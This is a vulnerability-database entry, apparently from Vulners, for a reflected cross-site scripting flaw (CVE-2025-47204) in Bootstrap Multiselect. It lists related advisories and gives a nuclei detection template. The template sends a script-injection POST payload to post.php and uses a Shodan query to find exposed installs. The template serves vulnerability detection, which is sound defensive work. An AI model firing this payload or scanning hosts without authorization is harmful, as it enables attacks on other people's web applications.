Lucene search
K

Bootstrap Multiselect <= 1.1.2 - Cross-Site Scripting

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 31 Views

Bootstrap Multiselect <= 1.1.2 allows Cross-Site Scripting via arbitrary POST data exploitation.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-47204
13 May 202516:30
circl
CNNVD
Bootstrap 安全漏洞
13 May 202500:00
cnnvd
CVE
CVE-2025-47204
13 May 202500:00
cve
Cvelist
CVE-2025-47204
13 May 202500:00
cvelist
EUVD
EUVD-2025-14385
3 Oct 202520:07
euvd
Github Security Blog
Bootstrap Multiselect Vulnerable to CSRF and Reflective XSS via Arbitrary POST Data
13 May 202518:30
github
NVD
CVE-2025-47204
13 May 202516:15
nvd
OSV
CVE-2025-47204
13 May 202500:00
osv
OSV
GHSA-GV5R-9GXR-V74W Bootstrap Multiselect Vulnerable to CSRF and Reflective XSS via Arbitrary POST Data
13 May 202518:30
osv
Positive Technologies
PT-2025-20925 · Unknown · Bootstrap-Multiselect
13 May 202500:00
ptsecurity
Rows per page
id: CVE-2025-47204

info:
  name: Bootstrap Multiselect <= 1.1.2 - Cross-Site Scripting
  author: r3naissance
  severity: medium
  description: |
    A PHP script in the source code release echoes arbitrary POST data. If a developer adopts this structure wholesale in a live application, it could create a Reflective Cross-Site Scripting (XSS) vulnerability exploitable through Cross-Site Request Forgery (CSRF).
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
  remediation: |
    Only use the necessary components (css/js) in production applications
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-47204
  classification:
    epss-score: 0.00424
    epss-percentile: 0.34162
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"bootstrap-multiselect"
  tags: cve,cve2025,xss,bootstrap-multiselect,vkev,vuln

http:
  - raw:
      - |
        POST /bootstrap-multiselect/post.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        canary="><script>alert(document.domain)</script>

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "<script>alert(document.domain)</script>", "bootstrap-multiselect-master")'
        condition: and
# digest: 4a0a00473045022100a9717e0c08dc8cb713c1fe3fc2010a58f636b25c7ed7f5ed99395e838d478d7a02202445a51eb23cd70b1eef2088e0306c852cac71f3be6606b5d7d3263ed9cfb3e8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.16.1
EPSS0.00424
SSVC
31